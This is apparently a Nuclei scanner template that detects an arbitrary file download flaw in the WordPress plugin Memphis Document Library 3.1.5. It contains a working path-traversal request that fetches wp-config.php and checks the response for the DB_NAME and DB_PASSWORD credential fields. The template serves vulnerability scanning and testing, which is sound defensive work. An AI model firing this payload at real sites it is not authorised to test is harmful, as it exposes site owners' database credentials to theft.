id: wp-memphis-documents-library-lfi

info:
  name: WordPress Plugin Memphis Document Library 3.1.5 LFI
  author: 0x_Akoko
  severity: high
  tags: wordpress,wp-plugin,lfi
  description: Arbitrary file download in Memphis Document Library 3.1.5
  reference: |
        - https://www.exploit-db.com/exploits/39593
        - https://wpscan.com/vulnerability/53999c06-05ca-44f1-b713-1e4d6b4a3f9f

requests:
  - method: GET
    path:
      - '{{BaseURL}}/mdocs-posts/?mdocs-img-preview=../../../wp-config.php'
      - '{{BaseURL}}/?mdocs-img-preview=../../../wp-config.php'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        part: body
        condition: and

      - type: status
        status:
          - 200
